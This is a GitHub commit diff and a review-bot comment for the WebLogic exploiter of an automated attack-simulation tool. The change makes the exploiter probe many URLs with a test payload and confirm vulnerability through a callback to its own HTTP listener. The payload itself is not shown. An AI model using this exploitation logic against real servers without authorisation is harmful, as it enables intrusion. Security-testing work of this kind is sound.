Merge pull request #249 from VakarisZ/weblogic_performance_boost

Improved the speed of weblogic exploiter
This commit is contained in:
Daniel Goldberg 2019-01-29 15:31:32 +02:00 committed by GitHub
commit 06ff1e2a50
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 38 additions and 11 deletions


@ -54,7 +54,7 @@ class WebRCE(HostExploiter):
exploit_config['upload_commands'] = None exploit_config['upload_commands'] = None
# url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"] # url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
exploit_config['url_extensions'] = None exploit_config['url_extensions'] = []
# stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable. # stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
exploit_config['stop_checking_urls'] = False exploit_config['stop_checking_urls'] = False


@ -13,13 +13,16 @@ from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import threading import threading
import logging import logging
import time
__author__ = "VakarisZ" __author__ = "VakarisZ"
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
# How long server waits for get request in seconds # How long server waits for get request in seconds
SERVER_TIMEOUT = 4 SERVER_TIMEOUT = 4
# How long to wait for a request to go to vuln machine and then to our server from there. In seconds # How long should be wait after each request in seconds
REQUEST_DELAY = 0.0001
# How long to wait for a sign(request from host) that server is vulnerable. In seconds
REQUEST_TIMEOUT = 2 REQUEST_TIMEOUT = 2
# How long to wait for response in exploitation. In seconds # How long to wait for response in exploitation. In seconds
EXECUTION_TIMEOUT = 15 EXECUTION_TIMEOUT = 15
@ -66,18 +69,41 @@ class WebLogicExploiter(WebRCE):
print(e) print(e)
return True return True
def check_if_exploitable(self, url): def add_vulnerable_urls(self, urls, stop_checking=False):
"""
Overrides parent method to use listener server
"""
# Server might get response faster than it starts listening to it, we need a lock # Server might get response faster than it starts listening to it, we need a lock
httpd, lock = self._start_http_server() httpd, lock = self._start_http_server()
payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port) exploitable = False
for url in urls:
if self.check_if_exploitable_weblogic(url, httpd):
exploitable = True
break
if not exploitable and httpd.get_requests < 1:
# Wait for responses
time.sleep(REQUEST_TIMEOUT)
if httpd.get_requests > 0:
# Add all urls because we don't know which one is vulnerable
self.vulnerable_urls.extend(urls)
self._exploit_info['vulnerable_urls'] = self.vulnerable_urls
else:
LOG.info("No vulnerable urls found, skipping.")
self._stop_http_server(httpd, lock)
def check_if_exploitable_weblogic(self, url, httpd):
payload = self.get_test_payload(ip=httpd.local_ip, port=httpd.local_port)
try: try:
post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False) post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False)
except exceptions.ReadTimeout: except exceptions.ReadTimeout:
# Our request does not get response thus we get ReadTimeout error # Our request will not get response thus we get ReadTimeout error
pass pass
except Exception as e: except Exception as e:
LOG.error("Something went wrong: %s" % e) LOG.error("Something went wrong: %s" % e)
self._stop_http_server(httpd, lock)
return httpd.get_requests > 0 return httpd.get_requests > 0
def _start_http_server(self): def _start_http_server(self):
@ -94,7 +120,8 @@ class WebLogicExploiter(WebRCE):
lock.acquire() lock.acquire()
return httpd, lock return httpd, lock
def _stop_http_server(self, httpd, lock): @staticmethod
def _stop_http_server(httpd, lock):
lock.release() lock.release()
httpd.join(SERVER_TIMEOUT) httpd.join(SERVER_TIMEOUT)
httpd.stop() httpd.stop()
@ -168,8 +195,8 @@ class WebLogicExploiter(WebRCE):
we determine if we can exploit by either getting a GET request from host or not. we determine if we can exploit by either getting a GET request from host or not.
""" """
def __init__(self, local_ip, local_port, lock, max_requests=1): def __init__(self, local_ip, local_port, lock, max_requests=1):
self._local_ip = local_ip self.local_ip = local_ip
self._local_port = local_port self.local_port = local_port
self.get_requests = 0 self.get_requests = 0
self.max_requests = max_requests self.max_requests = max_requests
self._stopped = False self._stopped = False
@ -184,7 +211,7 @@ class WebLogicExploiter(WebRCE):
LOG.info('Server received a request from vulnerable machine') LOG.info('Server received a request from vulnerable machine')
self.get_requests += 1 self.get_requests += 1
LOG.info('Server waiting for exploited machine request...') LOG.info('Server waiting for exploited machine request...')
httpd = HTTPServer((self._local_ip, self._local_port), S) httpd = HTTPServer((self.local_ip, self.local_port), S)
httpd.daemon = True httpd.daemon = True
self.lock.release() self.lock.release()
while not self._stopped and self.get_requests < self.max_requests: while not self._stopped and self.get_requests < self.max_requests:
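Review bot: In the `@ -66,18 +69,41` hunk, `check_if_exploitable_weblogic` passes `timeout=REQUEST_DELAY` (0.0001 s) as a single number, and requests applies a scalar timeout to the connect phase as well as the read, so against anything slower than a loopback link the TCP connect is likely to fail with `ConnectTimeout` before the payload is sent; that exception is not `ReadTimeout`, so it lands in the generic `except Exception` branch and is logged as "Something went wrong" while the probe silently never reaches the target. Keeping a normal connect budget and only shortening the read wait looks like the intent, e.g. `post(url, data=payload, headers=HEADERS, timeout=(REQUEST_TIMEOUT, REQUEST_DELAY), verify=False)`. The new `stop_checking=False` parameter of `add_vulnerable_urls` is never read in the body; if it is only kept to match the parent signature, a comment such as `# stop_checking is unused: callback-based detection cannot attribute a hit to a single url` would save the next reader from looking for it. The comment on `REQUEST_DELAY` in the `@ -13,13 +13,16` hunk describes a wait after each request, but the constant is used as the HTTP timeout; `# Read timeout for the probe request; the real signal is the callback to our server. In seconds` matches its use.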